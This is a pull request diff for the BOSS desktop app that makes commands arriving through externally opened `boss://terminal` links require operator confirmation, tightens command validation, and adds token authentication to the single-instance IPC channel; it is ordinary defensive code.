### PR TITLE
Harden the external entry points and credential sanitizing

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -145,6 +145,31 @@ logger.error(LogCategory.NETWORK, "Request failed", error = exception)
 
 App registers `boss://` protocol for authentication callbacks from external browsers.
 
+Because the scheme is registered with the OS, a `boss://` link is not evidence
+that the operator asked for anything — any program that can ask the OS to open a
+URL produces the same input. Entry points therefore tag each link with a
+`DeepLinkOrigin`:
+
+- `OPERATOR_CLI` — BOSS's own CLI parsed it out of this process's `argv`
+  (`createBossCLI`), i.e. arguments passed to the BOSS executable directly.
+- `EXTERNAL` — the OS URL-open handler, a `boss://` argument from the registered
+  protocol handler, or a forward over the single-instance channel that said so.
+  Also the default for an unstated origin, so a new caller that forgets to say
+  gets the cautious handling.
+
+Only `boss://terminal?command=` consults it today: an `OPERATOR_CLI` command runs
+as before, anything else is shown to the operator for confirmation first (the
+`boss` shell shim converts to a `boss://` URL and opens it via the OS, so its
+`terminal -c` still works, with one confirmation). Other hosts — including
+`boss://plugin?id=…&action=…` — are unchanged.
+
+**Single-instance channel**: `SingleInstanceManager` publishes
+`~/.boss/run/single-instance` (owner-only) with the channel endpoint and a token
+minted at startup, and listens on a Unix-domain socket in that directory (macOS,
+Linux) or a loopback port (Windows). Every request must present the token,
+"another instance is running" means something answered on the channel rather than
+a pid existing, and a descriptor nobody answers on is reclaimed.
+
 ## Documentation
 
 - [Core Subsystems](docs/SUBSYSTEMS.md) - Auth, UI, keyboard shortcuts, threading, default browser, runner, BossTerm

--- a/composeApp/src/commonMain/kotlin/ai/rever/boss/app/BossAppDialogs.kt
+++ b/composeApp/src/commonMain/kotlin/ai/rever/boss/app/BossAppDialogs.kt
@@ -23,6 +23,7 @@ import ai.rever.boss.components.wizard.plugin.PluginWizardWindow
 import ai.rever.boss.components.wizard.plugin.rememberPluginInstallWizardState
 import ai.rever.boss.components.workspaces.applyWorkspace
 import ai.rever.boss.components.workspaces.workspaceManager
+import ai.rever.boss.dashboard.DashboardStatsManager
 import ai.rever.boss.icons.FileIcons
 import ai.rever.boss.keymap.KeymapSettingsManager
 import ai.rever.boss.keymap.model.KeymapActions
@@ -412,6 +413,30 @@ internal fun BossAppDialogs(state: BossAppState) {
             onOpenSettings = {
                 state.settingsInitialSection = "KEYMAP"
                 state.showSettingsDialog = true
+            },
+        )
+    }
+
+    // A terminal command that reached BOSS from outside the operator's own
+    // `boss` invocation. `boss://` is registered with the OS, so this request
+    // carries no evidence of who made it — the operator says whether it runs,
+    // and sees the exact text first.
+    state.pendingTerminalCommand?.let { pending ->
+        ConfirmationDialog(
+            title = "Run this command?",
+            message =
+                "BOSS was asked from outside the app to run a command in a new terminal tab. " +
+                    "It has not run. Confirm only if you recognise it:\n\n${pending.command}",
+            confirmText = "Run command",
+            onDismiss = { state.pendingTerminalCommand = null },
+            onConfirm = {
+                logger.info(
+                    LogCategory.TERMINAL,
+                    "Operator confirmed an externally requested terminal command",
+                    mapOf("windowId" to windowId),
+                )
+                splitViewState.openTerminalInActivePanel(pending.command, pending.workingDirectory)
+                DashboardStatsManager.recordTerminalSession()
             },
         )
     }

--- a/composeApp/src/commonMain/kotlin/ai/rever/boss/app/BossAppEventBusEffects.kt
+++ b/composeApp/src/commonMain/kotlin/ai/rever/boss/app/BossAppEventBusEffects.kt
@@ -79,8 +79,20 @@ internal fun BossAppEventBusEffects(state: BossAppState) {
         TerminalEventBus.terminalOpenEvents
             .filter { event -> event.sourceWindowId == windowId }
             .onEach { event ->
-                splitViewState.openTerminalInActivePanel(event.command, event.workingDirectory)
-                DashboardStatsManager.recordTerminalSession()
+                val command = event.command
+                if (event.requiresConfirmation && command != null) {
+                    // Show the operator the command and let them decide; the
+                    // prompt in BossAppDialogs opens the terminal on confirm.
+                    logger.info(
+                        LogCategory.TERMINAL,
+                        "Holding an externally requested terminal command for confirmation",
+                        mapOf("windowId" to windowId),
+                    )
+                    state.pendingTerminalCommand = PendingTerminalCommand(command, event.workingDirectory)
+                } else {
+                    splitViewState.openTerminalInActivePanel(command, event.workingDirectory)
+                    DashboardStatsManager.recordTerminalSession()
+                }
             }.launchIn(this)
 
         // Note: We DON'T call markReady() here - that happens AFTER Last Session loads

--- a/composeApp/src/commonMain/kotlin/ai/rever/boss/app/BossAppState.kt
+++ b/composeApp/src/commonMain/kotlin/ai/rever/boss/app/BossAppState.kt
@@ -90,6 +90,10 @@ internal class BossAppState(
     var pendingTerminalLinkUrl by mutableStateOf("")
     var pendingTerminalSourceId by mutableStateOf<String?>(null)
 
+    // A terminal command that arrived from outside this BOSS invocation and is
+    // waiting for the operator to confirm it. Null whenever nothing is pending.
+    var pendingTerminalCommand by mutableStateOf<PendingTerminalCommand?>(null)
+
     // Snapshot of the in-progress MRU tab cycle, drives the Ctrl+Tab switcher overlay
     // (null in positional mode and whenever no cycle is active).
     var tabCycleOverlay by mutableStateOf<TabCycleOverlayData?>(null)
@@ -134,6 +138,19 @@ internal class BossAppState(
         }
     }
 }
+
+/**
+ * A terminal command held back for the operator's confirmation.
+ *
+ * BOSS reaches this state when a `boss://terminal?command=` request arrives over
+ * a path any program can drive, rather than from the operator's own `boss`
+ * invocation (see `DeepLinkOrigin`). The command is carried verbatim so the
+ * prompt shows exactly what would run.
+ */
+internal data class PendingTerminalCommand(
+    val command: String,
+    val workingDirectory: String?,
+)
 
 /**
  * Builds the window's [BossAppState]: the component graph is remembered against

--- a/composeApp/src/commonMain/kotlin/ai/rever/boss/components/events/TerminalEventBus.kt
+++ b/composeApp/src/commonMain/kotlin/ai/rever/boss/components/events/TerminalEventBus.kt
@@ -11,11 +11,18 @@ import kotlinx.coroutines.flow.asSharedFlow
  * @property command Optional initial command to run in the terminal
  * @property sourceWindowId The window that initiated this event (required for multi-window support)
  * @property workingDirectory Optional working directory for the terminal
+ * @property requiresConfirmation True when [command] must be shown to the
+ *   operator and confirmed before it reaches a shell, because the request came
+ *   from somewhere other than the operator's own invocation of BOSS (see
+ *   `DeepLinkOrigin`). Ignored when [command] is null — opening an empty
+ *   terminal is the same request whoever asked. Defaults to false so the
+ *   in-app callers, which are the operator clicking something, stay direct.
  */
 data class TerminalOpenEvent(
     val command: String?,
     val sourceWindowId: String,
     val workingDirectory: String? = null,
+    val requiresConfirmation: Boolean = false,
 )
 
 /**
@@ -46,13 +53,15 @@ object TerminalEventBus {
      * @param command Optional command to run in the terminal
      * @param sourceWindowId The window that initiated this event (required for multi-window support)
      * @param workingDirectory Optional working directory for the terminal
+     * @param requiresConfirmation See [TerminalOpenEvent.requiresConfirmation]
      */
     suspend fun openTerminal(
         command: String? = null,
         sourceWindowId: String,
         workingDirectory: String? = null,
+        requiresConfirmation: Boolean = false,
     ) {
-        val event = TerminalOpenEvent(command, sourceWindowId, workingDirectory)
+        val event = TerminalOpenEvent(command, sourceWindowId, workingDirectory, requiresConfirmation)
         _terminalOpenEvents.emit(event)
         ipcBridge?.forward("TerminalOpenEvent", event, sourceWindowId)
     }

--- a/composeApp/src/desktopMain/kotlin/ai/rever/boss/cli/BossCommand.kt
+++ b/composeApp/src/desktopMain/kotlin/ai/rever/boss/cli/BossCommand.kt
@@ -1,6 +1,7 @@
 package ai.rever.boss.cli
 
 import ai.rever.boss.utils.DeepLinkHandler
+import ai.rever.boss.utils.DeepLinkOrigin
 import com.github.ajalt.clikt.core.CliktCommand
 import com.github.ajalt.clikt.core.Context
 import com.github.ajalt.clikt.core.NoOpCliktCommand
@@ -20,6 +21,12 @@ import java.net.URLEncoder
  *   boss folder <path>              # Opens folder in codebase
  *   boss terminal                   # Opens terminal
  *   boss terminal -c <command>      # Opens terminal with command
+ *
+ * These commands are only ever built from this process's own `argv` — `main()`
+ * hands the arguments the operator passed to the BOSS executable to
+ * [createBossCLI] — so every link they produce carries
+ * [DeepLinkOrigin.OPERATOR_CLI]. That is the one origin the terminal handler
+ * runs a command for without prompting; see [DeepLinkOrigin].
  */
 class BossCommand : NoOpCliktCommand(name = "boss") {
     override fun help(context: Context) = "BOSS Console - Business Operating System + Simulation"
@@ -38,7 +45,7 @@ class BossUrlCommand : CliktCommand(name = "url") {
         // Convert to deep link
         val encodedUrl = URLEncoder.encode(url, "UTF-8")
         val deepLink = "boss://url?url=$encodedUrl"
-        DeepLinkHandler.processDeepLink(deepLink)
+        DeepLinkHandler.processDeepLink(deepLink, DeepLinkOrigin.OPERATOR_CLI)
     }
 }
 
@@ -55,7 +62,7 @@ class BossWorkspaceCommand : CliktCommand(name = "workspace") {
         // Convert to deep link
         val encodedPath = URLEncoder.encode(configPath, "UTF-8")
         val deepLink = "boss://workspace?path=$encodedPath"
-        DeepLinkHandler.processDeepLink(deepLink)
+        DeepLinkHandler.processDeepLink(deepLink, DeepLinkOrigin.OPERATOR_CLI)
     }
 }
 
@@ -72,7 +79,7 @@ class BossFileCommand : CliktCommand(name = "file") {
         // Convert to deep link
         val encodedPath = URLEncoder.encode(filePath, "UTF-8")
         val deepLink = "boss://file?path=$encodedPath"
-        DeepLinkHandler.processDeepLink(deepLink)
+        DeepLinkHandler.processDeepLink(deepLink, DeepLinkOrigin.OPERATOR_CLI)
     }
 }
 
@@ -89,7 +96,7 @@ class BossFolderCommand : CliktCommand(name = "folder") {
         // Convert to deep link
         val encodedPath = URLEncoder.encode(folderPath, "UTF-8")
         val deepLink = "boss://folder?path=$encodedPath"
-        DeepLinkHandler.processDeepLink(deepLink)
+        DeepLinkHandler.processDeepLink(deepLink, DeepLinkOrigin.OPERATOR_CLI)
     }
 }
 
@@ -113,7 +120,7 @@ class BossTerminalCommand : CliktCommand(name = "terminal") {
             } else {
                 "boss://terminal"
             }
-        DeepLinkHandler.processDeepLink(deepLink)
+        DeepLinkHandler.processDeepLink(deepLink, DeepLinkOrigin.OPERATOR_CLI)
     }
 }
 

--- a/composeApp/src/desktopMain/kotlin/ai/rever/boss/cli/CLICommandHandler.kt
+++ b/composeApp/src/desktopMain/kotlin/ai/rever/boss/cli/CLICommandHandler.kt
@@ -7,6 +7,7 @@ import ai.rever.boss.components.workspaces.LayoutWorkspace
 import ai.rever.boss.components.workspaces.WorkspaceSerializer
 import ai.rever.boss.components.workspaces.applyWorkspace
 import ai.rever.boss.services.URLHandlerService
+import ai.rever.boss.utils.DeepLinkOrigin
 import ai.rever.boss.utils.WindowFocusManager
 import ai.rever.boss.utils.extractFileName
 import ai.rever.boss.utils.logging.BossLogger
@@ -29,7 +30,11 @@ class CLICommandHandler private constructor() {
     private val logger = BossLogger.forComponent("CLICommandHandler")
 
     private val commandQueue = ConcurrentLinkedQueue<CLICommand>()
-    private val terminalQueue = ConcurrentLinkedQueue<String>() // Use empty string as sentinel for null
+
+    // Holds whole commands, not just the command text: the origin decides whether
+    // the command may run unattended, and a queue that dropped it would turn a
+    // cold-start request into an unattributed one.
+    private val terminalQueue = ConcurrentLinkedQueue<CLICommand.OpenTerminal>()
     private val workspaceQueue = ConcurrentLinkedQueue<String>()
     private val fileQueue = ConcurrentLinkedQueue<String>()
 
@@ -106,19 +111,18 @@ class CLICommandHandler private constructor() {
         // Process queued terminal events
         scope.launch {
             while (terminalQueue.isNotEmpty()) {
-                val command = terminalQueue.poll()
-                if (command != null) {
-                    // Convert empty string sentinel back to null
-                    val actualCommand = if (command.isEmpty()) null else command
+                val queued = terminalQueue.poll()
+                if (queued != null) {
                     logger.debug(
                         LogCategory.SYSTEM,
                         "Processing queued terminal command",
                         mapOf(
-                            "hasCommand" to (actualCommand != null),
+                            "hasCommand" to (queued.command != null),
+                            "origin" to queued.origin.name,
                         ),
                     )
                     try {
-                        handleOpenTerminal(actualCommand)
+                        handleOpenTerminal(queued.command, queued.origin)
                     } catch (e: Exception) {
                         logger.error(LogCategory.SYSTEM, "Failed to process queued terminal event", error = e)
                     }
@@ -220,29 +224,28 @@ class CLICommandHandler private constructor() {
                 }
 
                 is CLICommand.OpenTerminal -> {
-                    val queuedCommand = command.command ?: "" // Use empty string as sentinel for null
-
                     if (isTerminalHandlerReady) {
                         // Terminal handler ready - execute immediately
                         logger.debug(
                             LogCategory.SYSTEM,
                             "Terminal handler ready, executing immediately",
                             mapOf(
-                                "hasCommand" to queuedCommand.isNotEmpty(),
+                                "hasCommand" to (command.command != null),
+                                "origin" to command.origin.name,
                             ),
                         )
-                        val actualCommand = if (queuedCommand.isEmpty()) null else queuedCommand
-                        handleOpenTerminal(actualCommand)
+                        handleOpenTerminal(command.command, command.origin)
                     } else {
                         // Terminal handler not ready - queue for later (cold start)
                         logger.debug(
                             LogCategory.SYSTEM,
                             "Terminal handler not ready, queueing",
                             mapOf(
-                                "hasCommand" to queuedCommand.isNotEmpty(),
+                                "hasCommand" to (command.command != null),
+                                "origin" to command.origin.name,
                             ),
                         )
-                        terminalQueue.add(queuedCommand)
+                        terminalQueue.add(command)
                     }
                 }
             }
@@ -460,13 +463,32 @@ class CLICommandHandler private constructor() {
      *
      * Direct emit only - queueing is handled in executeCommand().
      * This is called from markTerminalHandlerReady() after handler is ready.
+     *
+     * A command only runs unattended when [origin] says the operator asked for
+     * it themselves. Any other origin — above all a `boss://terminal?command=`
+     * link, which the OS will accept from any program that can ask it to open a
+     * URL — is marked for confirmation, and the window shows the operator the
+     * exact command before a shell ever sees it. Opening a terminal with no
+     * command is the same request either way and never prompts.
      */
-    private suspend fun handleOpenTerminal(command: String?) {
-        // Validate command for security if provided
-        if (command != null && !CLISecurityValidator.isValidCommand(command)) {
-            logger.warn(LogCategory.SYSTEM, "Invalid terminal command (security check failed)")
+    private suspend fun handleOpenTerminal(
+        command: String?,
+        origin: DeepLinkOrigin,
+    ) {
+        val disposition = terminalCommandDisposition(command, origin)
+        if (disposition == TerminalCommandDisposition.REJECT) {
+            logger.warn(
+                LogCategory.SYSTEM,
+                "Terminal command rejected before it could run",
+                mapOf(
+                    "origin" to origin.name,
+                    "wellFormed" to (command != null && CLISecurityValidator.isValidCommand(command)),
+                    "length" to (command?.length ?: 0),
+                ),
+            )
             return
         }
+        val requiresConfirmation = disposition == TerminalCommandDisposition.CONFIRM
 
         // Resolve the target window (see handleLoadWorkspace for why this is
         // not focusedWindowFlow).
@@ -484,13 +506,19 @@ class CLICommandHandler private constructor() {
         // The active window's BossApp will listen and create the terminal tab
         CoroutineScope(Dispatchers.Main).launch {
             try {
-                TerminalEventBus.openTerminal(command, sourceWindowId = focusedWindowId)
+                TerminalEventBus.openTerminal(
+                    command,
+                    sourceWindowId = focusedWindowId,
+                    requiresConfirmation = requiresConfirmation,
+                )
                 logger.debug(
                     LogCategory.SYSTEM,
                     "Emitted terminal open event",
                     mapOf(
                         "hasCommand" to (command != null),
                         "windowId" to focusedWindowId,
+                        "origin" to origin.name,
+                        "requiresConfirmation" to requiresConfirmation,
                     ),
                 )
 
@@ -506,6 +534,48 @@ class CLICommandHandler private constructor() {
         }
     }
 }
+
+/**
+ * Longest command BOSS will put in front of the operator for confirmation. A
+ * command it cannot show in full is not one anybody can meaningfully approve, so
+ * a longer one from outside the operator's own invocation is dropped rather than
+ * prompted. Commands the operator passed to `boss` themselves are never shown and
+ * are bounded only by [CLISecurityValidator.isValidCommand].
+ */
+internal const val TERMINAL_CONFIRM_MAX_COMMAND_LENGTH = 512
+
+/** What BOSS does with a `boss://terminal` request. */
+internal enum class TerminalCommandDisposition {
+    /** Open a terminal, typing the command if there is one. */
+    RUN,
+
+    /** Show the operator the command and open a terminal only if they confirm. */
+    CONFIRM,
+
+    /** Do nothing at all. */
+    REJECT,
+}
+
+/**
+ * Decides what happens to a terminal request, from the command's shape and who
+ * asked for it.
+ *
+ * A request with no command just opens a terminal, which is the same request
+ * whoever made it. A command runs unattended only when [origin] says the operator
+ * ran `boss` themselves; otherwise it is put in front of them first, and dropped
+ * outright if it is malformed or too long to display in full.
+ */
+internal fun terminalCommandDisposition(
+    command: String?,
+    origin: DeepLinkOrigin,
+): TerminalCommandDisposition =
+    when {
+        command == null -> TerminalCommandDisposition.RUN
+        !CLISecurityValidator.isValidCommand(command) -> TerminalCommandDisposition.REJECT
+        origin.isOperatorInitiated -> TerminalCommandDisposition.RUN
+        command.length > TERMINAL_CONFIRM_MAX_COMMAND_LENGTH -> TerminalCommandDisposition.REJECT
+        else -> TerminalCommandDisposition.CONFIRM
+    }
 
 /**
  * Sealed class representing CLI commands.
@@ -527,7 +597,15 @@ sealed class CLICommand {
         val folderPath: String,
     ) : CLICommand()
 
+    /**
+     * @property command the command to type into the terminal, or null to just
+     *   open one.
+     * @property origin who asked. Defaults to [DeepLinkOrigin.EXTERNAL] so a
+     *   caller that does not say gets the cautious handling; see
+     *   [CLICommandHandler.handleOpenTerminal].
+     */
     data class OpenTerminal(
         val command: String?,
+        val origin: DeepLinkOrigin = DeepLinkOrigin.EXTERNAL,
     ) : CLICommand()
 }

--- a/composeApp/src/desktopMain/kotlin/ai/rever/boss/cli/CLISecurityValidator.kt
+++ b/composeApp/src/desktopMain/kotlin/ai/rever/boss/cli/CLISecurityValidator.kt
@@ -79,16 +79,33 @@ object CLISecurityValidator {
     }
 
     /**
-     * Validates terminal command for security.
+     * Longest terminal command BOSS will type into a shell — well past anything
+     * a person writes by hand, and a bound on what a caller can make the app
+     * hold. Commands that must be confirmed are held to the tighter
+     * [TERMINAL_CONFIRM_MAX_COMMAND_LENGTH], which is what the prompt can show in
+     * full.
      */
-    fun isValidCommand(command: String): Boolean {
-        // Check for null bytes
-        if (command.contains('\u0000')) {
-            return false
-        }
+    private const val MAX_COMMAND_LENGTH = 4096
 
-        // For now, allow all commands
-        // Could add whitelist or blacklist in future
-        return true
-    }
+    /**
+     * Checks that a terminal command is well formed: one non-empty line of
+     * printable text, no longer than [MAX_COMMAND_LENGTH].
+     *
+     * This is a shape check, not a judgement about what the command does. An
+     * allow-list of commands would rule out the legitimate use — `boss terminal
+     * -c` exists precisely to run whatever the operator types — without ruling
+     * out much else, so **who asked** is decided separately by
+     * [ai.rever.boss.utils.DeepLinkOrigin]: only a request the operator made
+     * themselves runs without a prompt.
+     *
+     * Control characters are rejected because the command is written into a
+     * shell followed by a single Enter — an embedded line break would submit
+     * further lines that nothing ever displayed, so keeping the command to one
+     * line is what makes the text shown equal to the text that runs. The NUL
+     * byte the previous check looked for is one of them.
+     */
+    fun isValidCommand(command: String): Boolean =
+        command.isNotBlank() &&
+            command.length <= MAX_COMMAND_LENGTH &&
+            command.none { it.isISOControl() }
 }

--- a/composeApp/src/desktopMain/kotlin/ai/rever/boss/main.kt
+++ b/composeApp/src/desktopMain/kotlin/ai/rever/boss/main.kt
@@ -12,6 +12,7 @@ import ai.rever.boss.plugin.pathutils.BossDirectories
 import ai.rever.boss.plugin.ui.BossThemeController
 import ai.rever.boss.services.passkey.PasskeyPlatformInit
 import ai.rever.boss.utils.DeepLinkHandler
+import ai.rever.boss.utils.DeepLinkOrigin
 import ai.rever.boss.utils.SingleInstanceManager
 import ai.rever.boss.utils.WindowsProtocolHandler
 import ai.rever.boss.utils.logging.BossLogger
@@ -146,13 +147,19 @@ fun main(args: Array<String>) {
         if (deepLink != null) {
             logger.info(LogCategory.SYSTEM, "Sending URL to existing instance")
 
+            // The origin is stated, not assumed: a `boss://` argument in this
+            // process's argv is how the OS protocol handler delivers a URL
+            // somebody asked it to open, so it is forwarded as external. The
+            // running instance takes that label rather than inferring anything
+            // from the fact that this process could present the channel token.
+
             // Try to send with retry logic (important for auth deep links during sign-in)
             // Note: runBlocking is acceptable here as this runs during pre-UI initialization,
             // before the Compose application starts. No UI thread exists yet to block.
             var success = false
             val maxRetries = 3
             for (attempt in 1..maxRetries) {
-                if (SingleInstanceManager.sendToExistingInstance(deepLink)) {
+                if (SingleInstanceManager.sendToExistingInstance(deepLink, DeepLinkOrigin.EXTERNAL)) {
                     logger.info(LogCategory.SYSTEM, "URL sent successfully", mapOf("attempt" to attempt))
                     success = true
                     break

--- a/composeApp/src/desktopMain/kotlin/ai/rever/boss/utils/ApplicationRestarter.kt
+++ b/composeApp/src/desktopMain/kotlin/ai/rever/boss/utils/ApplicationRestarter.kt
@@ -93,9 +93,10 @@ object ApplicationRestarter {
 
         // Windows / Linux packaged native launcher → re-exec it (with the same args)
         // once the old process exits. The wait-for-old-PID is essential on every
-        // platform: SingleInstanceManager.acquireLock() returns false while the old PID
-        // is still alive, so a new instance that starts too early just exits — and
-        // nothing comes back (the very bug this fixes).
+        // platform: SingleInstanceManager.acquireLock() returns false while the old
+        // instance still answers on the single-instance channel, so a new instance
+        // that starts too early just exits — and nothing comes back (the very bug
+        // this fixes).
         if (launcher != null && !isJavaLauncher) {
             val args =
                 runCatching {

--- a/composeApp/src/desktopMain/kotlin/ai/rever/boss/utils/DeepLinkHandler.kt
+++ b/composeApp/src/desktopMain/kotlin/ai/rever/boss/utils/DeepLinkHandler.kt
@@ -125,7 +125,11 @@ actual object DeepLinkHandler {
                         logger.debug(LogCategory.BROWSER, "Handling as HTTP(S) URL")
                         URLHandlerService.handleURL(uri)
                     } else {
-                        // Handle boss:// deep links for auth
+                        // Handle boss:// deep links for auth. The flow carries
+                        // OS-delivered links only, and its collectors re-enter
+                        // through processDeepLink(uri), which is
+                        // DeepLinkOrigin.EXTERNAL — the correct origin for
+                        // everything the OS hands over.
                         _deepLinkFlow.value = uri
                     }
                 }
@@ -209,13 +213,40 @@ actual object DeepLinkHandler {
         if (isWindows) {
             WindowsProtocolHandler.extractDeepLinkFromArgs(args)?.let { url ->
                 logger.info(LogCategory.SYSTEM, "Received deep link from command line", mapOf("uri" to LogSanitizer.maskUriParams(url)))
-                processDeepLink(url)
+                // A `boss://` argument on Windows is how the registered protocol
+                // handler delivers a URL somebody asked the OS to open, so it is
+                // external regardless of who launched the process.
+                processDeepLink(url, DeepLinkOrigin.EXTERNAL)
             }
         }
     }
 
+    /**
+     * Processes a link of unstated origin, which is therefore
+     * [DeepLinkOrigin.EXTERNAL]. This is the multiplatform entry point and the
+     * one the OS-delivered [deepLinkFlow] re-enters through; callers that know
+     * the request came from the operator use the overload below.
+     */
     actual fun processDeepLink(uri: String) {
-        logger.info(LogCategory.SYSTEM, "Processing deep link", mapOf("uri" to LogSanitizer.maskUriParams(uri)))
+        processDeepLink(uri, DeepLinkOrigin.EXTERNAL)
+    }
+
+    /**
+     * Processes a link whose [origin] the caller can vouch for.
+     *
+     * [origin] reaches the handlers that need it (currently `boss://terminal`)
+     * because no later stage can tell an operator's request apart from one some
+     * other program asked the OS to open.
+     */
+    fun processDeepLink(
+        uri: String,
+        origin: DeepLinkOrigin,
+    ) {
+        logger.info(
+            LogCategory.SYSTEM,
+            "Processing deep link",
+            mapOf("uri" to LogSanitizer.maskUriParams(uri), "origin" to origin.name),
+        )
 
         // Routes match the whole host, never a prefix, so an unknown longer host
         // (boss://plugins, boss://filesystem) reaches the default flow instead of
@@ -242,7 +273,7 @@ actual object DeepLinkHandler {
         // window is plainly registered. Resolving here instead of inside each
         // handler is what keeps the window-targeting links from diverging again.
         // Safe on this thread: resolveActionableWindowId reads volatile state.
-        dispatch(host, uri, targetWindowIdFor(host) { WindowFocusManager.resolveActionableWindowId() })
+        dispatch(host, uri, targetWindowIdFor(host) { WindowFocusManager.resolveActionableWindowId() }, origin)
     }
 
     /**
@@ -254,12 +285,13 @@ actual object DeepLinkHandler {
         host: DeepLinkHost,
         uri: String,
         targetWindowId: String?,
+        origin: DeepLinkOrigin,
     ) {
         when (host) {
             DeepLinkHost.URL -> handleUrlLink(uri)
             DeepLinkHost.WORKSPACE -> handleWorkspaceLink(uri)
             DeepLinkHost.FILE -> handleFileLink(uri)
-            DeepLinkHost.TERMINAL -> handleTerminalLink(uri)
+            DeepLinkHost.TERMINAL -> handleTerminalLink(uri, origin)
             DeepLinkHost.FOLDER -> handleFolderLink(uri, targetWindowId)
             DeepLinkHost.PLUGIN -> handlePluginLink(uri, targetWindowId)
             DeepLinkHost.SPLIT -> handleSplitLink(uri, targetWindowId)
@@ -275,9 +307,18 @@ actual object DeepLinkHandler {
      * Examples:
      *   boss://terminal
      *   boss://terminal?command=ls%20-la
+     *
+     * [origin] travels with the command all the way to
+     * [ai.rever.boss.cli.CLICommandHandler], which runs a command outright only
+     * for [DeepLinkOrigin.OPERATOR_CLI] and asks the operator to confirm the
+     * exact text otherwise. Opening a terminal with no command needs no such
+     * distinction and behaves the same either way.
      */
-    private fun handleTerminalLink(uri: String) {
-        logger.debug(LogCategory.TERMINAL, "Handling terminal link")
+    private fun handleTerminalLink(
+        uri: String,
+        origin: DeepLinkOrigin,
+    ) {
+        logger.debug(LogCategory.TERMINAL, "Handling terminal link", mapOf("origin" to origin.name))
 
         val params = parseQueryParams(uri)
         val command = params["command"]?.urlDecode()
@@ -285,12 +326,16 @@ actual object DeepLinkHandler {
         // Create a CLI command and queue it
         val cliCommand =
             ai.rever.boss.cli.CLICommand
-                .OpenTerminal(command)
+                .OpenTerminal(command, origin)
         ai.rever.boss.cli.CLICommandHandler
             .getInstance()
             .queueCommand(cliCommand)
 
-        logger.info(LogCategory.TERMINAL, "Terminal command queued", mapOf("hasCommand" to (command != null)))
+        logger.info(
+            LogCategory.TERMINAL,
+            "Terminal command queued",
+            mapOf("hasCommand" to (command != null), "origin" to origin.name),
+        )
     }
 
     /**

--- a/composeApp/src/desktopMain/kotlin/ai/rever/boss/utils/DeepLinkOrigin.kt
+++ b/composeApp/src/desktopMain/kotlin/ai/rever/boss/utils/DeepLinkOrigin.kt
@@ -1,0 +1,47 @@
+package ai.rever.boss.utils
+
+/**
+ * Where a `boss://` request came from.
+ *
+ * The `boss://` scheme is registered with the OS, so a link arriving at the app
+ * is not evidence that the operator asked for anything: every program that can
+ * ask the OS to open a URL produces the same input the operator's own shell
+ * does, and by the time a link reaches a handler the two are indistinguishable.
+ * Entry points therefore state which one they are, and handlers that would act
+ * on the operator's behalf consult it.
+ *
+ * Absence is not neutral: anything that does not state an origin is treated as
+ * [EXTERNAL], so a new caller that forgets to say gets the cautious answer.
+ */
+enum class DeepLinkOrigin {
+    /**
+     * BOSS's own CLI parsed the request out of this process's `argv`
+     * ([ai.rever.boss.cli.createBossCLI]), which only happens for arguments the
+     * operator passed to the BOSS executable themselves.
+     */
+    OPERATOR_CLI,
+
+    /**
+     * The request came in over a path any program can drive: the OS URL-open
+     * handler, a `boss://` argument handed over by the registered protocol
+     * handler, or a forward across the single-instance channel that labelled
+     * itself this way. Also the default for an unstated origin.
+     */
+    EXTERNAL,
+    ;
+
+    /** True when the request is known to be the operator acting on their own machine. */
+    val isOperatorInitiated: Boolean
+        get() = this == OPERATOR_CLI
+
+    companion object {
+        /**
+         * Reads an origin off the single-instance wire format, mapping anything
+         * unrecognised — including a missing label — to [EXTERNAL].
+         */
+        fun fromWireLabel(label: String?): DeepLinkOrigin {
+            val normalized = label?.trim()?.uppercase()
+            return entries.firstOrNull { it.name == normalized } ?: EXTERNAL
+        }
+    }
+}

--- a/composeApp/src/desktopMain/kotlin/ai/rever/boss/utils/SingleInstanceManager.kt
+++ b/composeApp/src/desktopMain/kotlin/ai/rever/boss/utils/SingleInstanceManager.kt
@@ -1,28 +1,599 @@
 package ai.rever.boss.utils
 
+import ai.rever.boss.plugin.pathutils.BossDirectories
 import ai.rever.boss.utils.logging.BossLogger
 import ai.rever.boss.utils.logging.LogCategory
-import java.io.BufferedReader
+import java.io.BufferedInputStream
+import java.io.ByteArrayOutputStream
 import java.io.File
-import java.io.InputStreamReader
-import java.io.PrintWriter
+import java.io.IOException
+import java.io.InputStream
 import java.net.InetAddress
-import java.net.ServerSocket
-import java.net.Socket
-import java.net.SocketException
-import java.net.SocketTimeoutException
+import java.net.InetSocketAddress
+import java.net.StandardProtocolFamily
+import java.net.UnixDomainSocketAddress
+import java.nio.ByteBuffer
+import java.nio.channels.Channels
+import java.nio.channels.ServerSocketChannel
+import java.nio.channels.SocketChannel
+import java.nio.charset.StandardCharsets
+import java.nio.file.Files
+import java.nio.file.Path
+import java.nio.file.StandardOpenOption
+import java.nio.file.attribute.PosixFilePermission
+import java.nio.file.attribute.PosixFilePermissions
+import java.security.MessageDigest
+import java.security.SecureRandom
+import java.util.HexFormat
+import java.util.concurrent.Executors
+import java.util.concurrent.ScheduledFuture
+import java.util.concurrent.ThreadFactory
+import java.util.concurrent.TimeUnit
 import kotlin.concurrent.thread
 
+private val logger = BossLogger.forComponent("SingleInstanceManager")
+
+/** Descriptor format marker; bumped if the fields below ever change meaning. */
+private const val DESCRIPTOR_VERSION = "1"
+
+private const val KEY_VERSION = "version"
+private const val KEY_TRANSPORT = "transport"
+private const val KEY_ENDPOINT = "endpoint"
+private const val KEY_TOKEN = "token"
+
+/** Wire protocol marker, first field of every request line. */
+internal const val PROTOCOL_VERSION = "boss-si-1"
+
+/** Asks the running instance to prove it is listening. */
+internal const val VERB_PING = "PING"
+
+/** Asks the running instance to process a URL. */
+internal const val VERB_OPEN = "OPEN"
+
+internal const val RESPONSE_OK = "OK"
+internal const val RESPONSE_PONG = "PONG"
+internal const val RESPONSE_REJECTED = "REJECTED"
+
+/** 32 random bytes, hex encoded. */
+private const val TOKEN_BYTES = 32
+internal const val TOKEN_HEX_LENGTH = TOKEN_BYTES * 2
+
+private const val IPC_PORT_BASE = 56789
+private const val IPC_PORT_RANGE = 10 // Try ports 56789-56798
+private const val TCP_BACKLOG = 5
+
+private const val CONNECTION_TIMEOUT_MS = 10000L // 10 seconds - important for auth deep links
+
 /**
- * Manages single-instance application behavior
+ * Ceiling on a single request. Bounds what one caller can make the app buffer,
+ * and is far above the longest `boss://` URL the app produces.
+ */
+private const val MAX_REQUEST_BYTES = 16 * 1024
+
+/** A response is one short word; nothing legitimate approaches this. */
+private const val MAX_RESPONSE_BYTES = 256
+
+/**
+ * macOS caps a Unix-domain socket path at 104 bytes and Linux at 108. A home
